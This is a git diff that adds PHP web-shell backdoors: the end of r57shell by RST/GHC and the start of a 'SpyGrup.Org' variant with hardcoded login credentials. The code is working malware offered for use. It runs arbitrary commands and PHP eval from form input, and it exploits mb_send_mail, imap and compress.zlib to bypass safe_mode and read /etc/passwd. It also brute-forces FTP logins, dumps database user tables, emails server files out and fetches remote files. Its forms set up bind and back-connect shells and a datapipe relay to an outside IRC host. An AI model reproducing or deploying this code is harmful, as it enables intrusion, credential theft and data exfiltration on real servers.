+  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $lines = file ('/tmp/mb_send_mail');
+  foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");	
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+  @imap_close($stream);	
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo $str;
+  @imap_close($stream);	
+  break;
+  case 'test8':
+  if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
+  else echo $lang[$language.'_text119'];
+  break;	
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {	
+  $connection = @ftp_connect($ftp_server,$ftp_port,10);	
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } 
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];	
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); } 
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ } 
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function div_title($title, $id)
+{
+  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ { 
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">'; 	
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+$aliases2 = '';	
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$unix&&function_exists('mb_send_mail')){
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_list')){
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_body')){
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&$unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on)    $select .= '<option>PostgreSQL</option>';
+if($ora_on)   $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&$unix){
+echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>";
+echo '</body></html>';
+?>
\ No newline at end of file
diff --git a/138shell/R/r577.php.txt b/138shell/R/r577.php.txt
new file mode 100644
index 0000000..3d7547b
--- /dev/null
+++ b/138shell/R/r577.php.txt
@@ -0,0 +1,1889 @@
+<?php
+/******************************************************************************************************/
+/* 
+/* 
+/*    ssssssss  pppp  pppp    yyyyyy  yyyyyy    gggg  gggg  rrrr  rrrr  uuuu    uuuu  pppp  pppp  
+/*  ss            pppp    pp    yy      yy    gg    gggg      rrrr        uu      uu    pppp    pp
+/*   ssssss      pp      pp      yy  yy      gg      gg      rr          uu      uu    pp      pp
+/*         ss    pp      pp      yy  yy      gg      gg      rr          uu    uuuu    pp      pp
+/* ssssssss      pppppppp          yy          gggggggg    rrrrrrrr        uuuu  uuuu  pppppppp  
+/*               pp                yy                gg                                pp        
+/*             pppppp          yyyyyy          gggggg                                pppppp      
+/* 
+/*                    admin@spygrup.org[Kruis]   -   yaduris@spygrup.org[YaduriS]
+/*
+/*
+/*  r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ???? ???????  ?? ??????? ????? ???????
+/*  ??????: 1.23
+/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
+/******************************************************************************************************/
+
+/* ~~~ ?????????  ~~~ */
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "SpyGrup.Org SpeciaL";
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+
+/* ~~~ ?????????????? ~~~ */
+
+// $auth = 1; - ?????????????? ????????
+// $auth = 0; - ?????????????? ?????????
+$auth = 0;
+
+// ????? ? ?????? ??? ??????? ? ???????
+// ?? ???????? ??????? ????? ??????????? ?? ???????!!!
+$name='teufel'; // ????? ????????????
+$pass='spyms'; // ?????? ????????????
+
+if($auth == 1) {
